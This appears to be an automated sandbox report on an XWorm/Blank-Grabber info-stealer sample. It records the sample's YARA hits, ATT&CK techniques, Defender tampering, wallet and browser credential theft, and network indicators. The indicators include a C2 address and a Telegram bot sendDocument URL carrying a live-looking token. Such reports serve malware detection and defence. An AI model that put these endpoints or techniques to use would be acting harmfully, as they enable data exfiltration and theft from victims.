                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                      Source: Yara matchFile source: Process Memory Space: sB2ClgrGng.exe PID: 2892, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 00000000.00000003.1761043255.000001D372114000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1761043255.000001D372112000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.1783370880.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.1783258664.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.1782846759.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.1783075658.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.1782963753.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: sB2ClgrGng.exe PID: 5816, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: sB2ClgrGng.exe PID: 2892, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI58162\rarreg.key, type: DROPPED
                      Source: Yara matchFile source: Process Memory Space: sB2ClgrGng.exe PID: 2892, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: bound.exe PID: 7280, type: MEMORYSTR
                      Source: Yara matchFile source: 15.0.bound.exe.2f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000003.1823342722.00000281AC033000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.1833375883.00000281AC037000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.4216648760.0000000002617000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.1789335378.00000000002F2000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.1813675437.00000281AC033000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: sB2ClgrGng.exe PID: 2892, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: bound.exe PID: 7280, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\word.exe, type: DROPPED
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts341
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      41
                      Disable or Modify Tools
                      1
                      OS Credential Dumping
                      2
                      System Time Discovery
                      Remote Services11
                      Archive Collected Data
                      1
                      Web Service
                      Exfiltration Over Other Network Medium1
                      Data Encrypted for Impact
                      CredentialsDomainsDefault Accounts2
                      Native API
                      1
                      Scheduled Task/Job
                      1
                      Access Token Manipulation
                      111
                      Deobfuscate/Decode Files or Information
                      LSASS Memory3
                      File and Directory Discovery
                      Remote Desktop Protocol3
                      Data from Local System
                      1
                      Ingress Tool Transfer
                      Exfiltration Over Bluetooth11
                      System Shutdown/Reboot
                      Email AddressesDNS ServerDomain Accounts22
                      Command and Scripting Interpreter
                      21
                      Registry Run Keys / Startup Folder
                      11
                      Process Injection
                      22
                      Obfuscated Files or Information
                      Security Account Manager510
                      System Information Discovery
                      SMB/Windows Admin Shares1
                      Email Collection
                      21
                      Encrypted Channel
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts1
                      Scheduled Task/Job
                      Login Hook1
                      Scheduled Task/Job
                      211
                      Software Packing
                      NTDS1
                      Query Registry
                      Distributed Component Object Model1
                      Clipboard Data
                      1
                      Non-Standard Port
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud Accounts3
                      PowerShell
                      Network Logon Script21
                      Registry Run Keys / Startup Folder
                      1
                      DLL Side-Loading
                      LSA Secrets371
                      Security Software Discovery
                      SSHKeylogging3
                      Non-Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                      Masquerading
                      Cached Domain Credentials2
                      Process Discovery
                      VNCGUI Input Capture14
                      Application Layer Protocol
                      Data Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items261
                      Virtualization/Sandbox Evasion
                      DCSync261
                      Virtualization/Sandbox Evasion
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Access Token Manipulation
                      Proc Filesystem1
                      Application Window Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                      Process Injection
                      /etc/passwd and /etc/shadow1
                      System Network Configuration Discovery
                      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1532621 Sample: sB2ClgrGng.exe Startdate: 13/10/2024 Architecture: WINDOWS Score: 100 87 api.telegram.org 2->87 89 ip-api.com 2->89 97 Suricata IDS alerts for network traffic 2->97 99 Found malware configuration 2->99 101 Malicious sample detected (through community Yara rule) 2->101 105 21 other signatures 2->105 11 sB2ClgrGng.exe 23 2->11         started        15 word.exe 2->15         started        17 svchost.exe 2->17         started        20 6 other processes 2->20 signatures3 103 Uses the Telegram API (likely for C&C communication) 87->103 process4 dnsIp5 75 C:\Users\user\AppData\Local\Temp\...\rar.exe, PE32+ 11->75 dropped 77 C:\Users\user\AppData\Local\...\rarreg.key, ASCII 11->77 dropped 79 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 11->79 dropped 81 16 other files (none is malicious) 11->81 dropped 143 Modifies Windows Defender protection settings 11->143 145 Adds a directory exclusion to Windows Defender 11->145 147 Tries to harvest and steal WLAN passwords 11->147 149 Removes signatures from Windows Defender 11->149 22 sB2ClgrGng.exe 1 91 11->22         started        151 Multi AV Scanner detection for dropped file 15->151 85 127.0.0.1 unknown unknown 17->85 file6 signatures7 process8 dnsIp9 91 ip-api.com 208.95.112.1, 49749, 80 TUT-ASUS United States 22->91 119 Found many strings related to Crypto-Wallets (likely being stolen) 22->119 121 Tries to harvest and steal browser information (history, passwords, etc) 22->121 123 Modifies Windows Defender protection settings 22->123 125 5 other signatures 22->125 26 cmd.exe 1 22->26         started        29 cmd.exe 1 22->29         started        31 cmd.exe 1 22->31         started        33 27 other processes 22->33 signatures10 process11 signatures12 127 Suspicious powershell command line found 26->127 129 Encrypted powershell cmdline option found 26->129 131 Bypasses PowerShell execution policy 26->131 133 Uses netsh to modify the Windows network and firewall settings 26->133 35 powershell.exe 23 26->35         started        38 conhost.exe 26->38         started        40 bound.exe 29->40         started        44 conhost.exe 29->44         started        135 Modifies Windows Defender protection settings 31->135 137 Removes signatures from Windows Defender 31->137 46 powershell.exe 23 31->46         started        52 2 other processes 31->52 139 Adds a directory exclusion to Windows Defender 33->139 141 Tries to harvest and steal WLAN passwords 33->141 48 getmac.exe 33->48         started        50 powershell.exe 33->50         started        54 52 other processes 33->54 process13 dnsIp14 107 Loading BitLocker PowerShell Module 35->107 93 api.telegram.org 149.154.167.220, 443, 49738, 49750 TELEGRAMRU United Kingdom 40->93 95 198.23.219.104, 49739, 7000 AS-COLOCROSSINGUS United States 40->95 69 C:\Users\user\AppData\Roaming\word.exe, PE32 40->69 dropped 109 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 40->109 111 Uses shutdown.exe to shutdown or reboot the system 40->111 113 Uses schtasks.exe or at.exe to add and modify task schedules 40->113 56 schtasks.exe 40->56         started        58 shutdown.exe 40->58         started        115 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 48->115 117 Writes or reads registry keys via WMI 48->117 71 C:\Users\user\AppData\...\tuy1nspn.cmdline, Unicode 54->71 dropped 73 C:\Users\user\AppData\Local\Temp\mVQsx.zip, RAR 54->73 dropped 60 csc.exe 54->60         started        file15 signatures16 process17 file18 63 conhost.exe 56->63         started        65 conhost.exe 58->65         started        83 C:\Users\user\AppData\Local\...\tuy1nspn.dll, PE32 60->83 dropped 67 cvtres.exe 60->67         started        process19

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      sB2ClgrGng.exe53%ReversingLabsWin64.Backdoor.Xworm
                      sB2ClgrGng.exe67%VirustotalBrowse
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\_MEI58162\VCRUNTIME140.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\_MEI58162\VCRUNTIME140.dll0%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\_MEI58162\_bz2.pyd0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\_MEI58162\_bz2.pyd1%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\_MEI58162\_ctypes.pyd0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\_MEI58162\_ctypes.pyd1%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\_MEI58162\_decimal.pyd0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\_MEI58162\_decimal.pyd1%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\_MEI58162\_hashlib.pyd0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\_MEI58162\_hashlib.pyd1%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\_MEI58162\_lzma.pyd0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\_MEI58162\_lzma.pyd1%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\_MEI58162\_queue.pyd0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\_MEI58162\_queue.pyd1%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\_MEI58162\_socket.pyd0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\_MEI58162\_socket.pyd1%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\_MEI58162\_sqlite3.pyd0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\_MEI58162\_sqlite3.pyd1%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\_MEI58162\_ssl.pyd0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\_MEI58162\_ssl.pyd1%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\_MEI58162\libcrypto-3.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\_MEI58162\libcrypto-3.dll0%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\_MEI58162\libffi-8.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\_MEI58162\libffi-8.dll0%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\_MEI58162\libssl-3.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\_MEI58162\libssl-3.dll0%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\_MEI58162\python312.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\_MEI58162\python312.dll0%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe0%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\_MEI58162\select.pyd0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\_MEI58162\select.pyd2%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\_MEI58162\sqlite3.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\_MEI58162\sqlite3.dll0%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\_MEI58162\unicodedata.pyd0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\_MEI58162\unicodedata.pyd1%VirustotalBrowse
                      C:\Users\user\AppData\Roaming\word.exe84%ReversingLabsByteCode-MSIL.Backdoor.XWorm
                      C:\Users\user\AppData\Roaming\word.exe80%VirustotalBrowse
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      ip-api.com0%VirustotalBrowse
                      api.telegram.org2%VirustotalBrowse
                      No Antivirus matches
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      ip-api.com
                      208.95.112.1
                      truefalse
                      api.telegram.org
                      149.154.167.220
                      truetrue
                      NameMaliciousAntivirus DetectionReputation
                      198.23.219.104true
                        https://api.telegram.org/bot7151126433:AAGnFv8HooRtSQ_cEeb4ANUyyyQ1LbT0Ehc/sendDocumentfalse
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://logo.ver6sB2ClgrGng.exe, 00000001.00000003.1833375883.00000281AC05E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2184795367.00000281AC037000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164662200.00000281AC037000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2030259986.00000281AC03E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2166231720.00000281AC04B000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2191095661.00000281AC069000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1894131377.00000281AC066000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1878461049.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031560743.00000281AC03E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1920331178.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2187571679.00000281AC068000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1825104762.00000281AC05D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1823342722.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1893801082.00000281AC04F000.00000004.00000020.00020000.00000000.sdmpfalse
                            https://github.com/Blank-c/BlankOBFsB2ClgrGng.exe, 00000001.00000003.1781689076.00000281ABAAD000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1780927309.00000281AC123000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1781524596.00000281ABAAB000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1781240477.00000281ABA5E000.00000004.00000020.00020000.00000000.sdmpfalse
                              https://www.avito.ru/sB2ClgrGng.exe, 00000001.00000002.2191721671.00000281AC3E4000.00000004.00001000.00020000.00000000.sdmpfalse
                                https://api.telegram.org/botsB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1833375883.00000281AC037000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 0000000F.00000002.4216648760.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 0000000F.00000000.1789335378.00000000002F2000.00000002.00000001.01000000.00000013.sdmp, word.exe.15.drtrue
                                  https://github.com/Blank-c/Blank-GrabberisB2ClgrGng.exe, 00000001.00000003.1783370880.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1782846759.00000281ABA90000.00000004.00000020.00020000.00000000.sdmpfalse
                                    https://www.ctrip.com/sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpfalse
                                      https://github.com/Blank-c/Blank-GrabberrsB2ClgrGng.exe, 00000001.00000003.1783370880.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1782846759.00000281ABA90000.00000004.00000020.00020000.00000000.sdmpfalse
                                        https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000020.00000003.1849613191.000002224F0A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1849613191.000002224F0E8000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1849613191.000002224F0C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1849613191.000002224F0F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                          https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#sB2ClgrGng.exe, 00000001.00000003.1765814362.00000281A9CC0000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188382177.00000281A9C51000.00000004.00000020.00020000.00000000.sdmpfalse
                                            https://www.leboncoin.fr/sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpfalse
                                              https://tools.ietf.org/html/rfc2388#section-4.4sB2ClgrGng.exe, 00000001.00000002.2189355250.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2184336077.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031480408.00000281ABA66000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1919277034.00000281ABA74000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1829116745.00000281ABA75000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1810702061.00000281ABA75000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1900869577.00000281ABA75000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1852816239.00000281ABA73000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164533332.00000281ABA6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64sB2ClgrGng.exe, 00000001.00000003.1769395592.00000281AB9CC000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188382177.00000281A9C51000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1768908120.00000281AB9BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  https://g.live.com/odclientsettings/Prod.C:svchost.exe, 00000020.00000003.1849613191.000002224F072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    https://weibo.com/sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4C4000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      https://api.anonfiles.com/uploadsB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        https://www.msn.comsB2ClgrGng.exe, 00000001.00000003.2165800360.00000281AC9C6000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC53C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          https://nuget.org/nuget.exepowershell.exe, 0000000D.00000002.2036783032.000002463EB07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1942613111.000001F2267FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1994798538.000001F234F0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1994798538.000001F235050000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            https://discord.com/api/v9/users/sB2ClgrGng.exe, 00000001.00000003.2164533332.00000281ABA6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963sB2ClgrGng.exe, 00000001.00000002.2191571952.00000281AC220000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                http://cacerts.digisB2ClgrGng.exe, 00000000.00000003.1759226545.000001D37210F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  https://peps.python.org/pep-0205/sB2ClgrGng.exe, 00000001.00000003.1781323039.00000281AB969000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1769284741.00000281AB96D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1769626278.00000281AB96D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1777343894.00000281AB962000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1769914240.00000281AB96D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2189456125.00000281ABB20000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1770763715.00000281AB96D000.00000004.00000020.00020000.00000000.sdmp, base_library.zip.0.drfalse
                                                                    https://www.reddit.com/sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000D.00000002.1951924789.000002462EA91000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 0000000F.00000002.4216648760.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1942613111.000001F224E91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        https://www.amazon.ca/sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000020.00000003.1849613191.000002224F0C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filenamesB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188663974.00000281AB4E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxysB2ClgrGng.exe, 00000001.00000002.2191721671.00000281AC3E4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188663974.00000281AB4E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  https://www.ebay.co.uk/sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000033.00000002.1942613111.000001F2267A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000D.00000002.1951924789.000002462ECB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        https://www.ebay.de/sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000033.00000002.1942613111.000001F2267A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_codesB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188663974.00000281AB55C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              https://go.micropowershell.exe, 00000033.00000002.1942613111.000001F226052000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readersB2ClgrGng.exe, 00000001.00000003.1765814362.00000281A9CC0000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188382177.00000281A9C51000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  https://www.amazon.com/sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    https://github.com/python/cpython/issues/86361.sB2ClgrGng.exe, 00000001.00000002.2189355250.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1824376723.00000281ABADD000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2032780608.00000281ABADD000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1894030317.00000281ABAE4000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1852816239.00000281ABAE4000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2184336077.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031480408.00000281ABA66000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1919277034.00000281ABA74000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1784233182.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1783520888.00000281ABEF8000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1810702061.00000281ABA75000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1900869577.00000281ABA75000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164533332.00000281ABA6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      https://contoso.com/Iconpowershell.exe, 00000033.00000002.1994798538.000001F235050000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        https://httpbin.org/sB2ClgrGng.exe, 00000001.00000002.2188821100.00000281AB619000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          http://crl.ver)svchost.exe, 00000020.00000002.3494718781.000002224EE00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0ssB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_modulesB2ClgrGng.exe, 00000001.00000002.2188979517.00000281AB820000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmpfalse
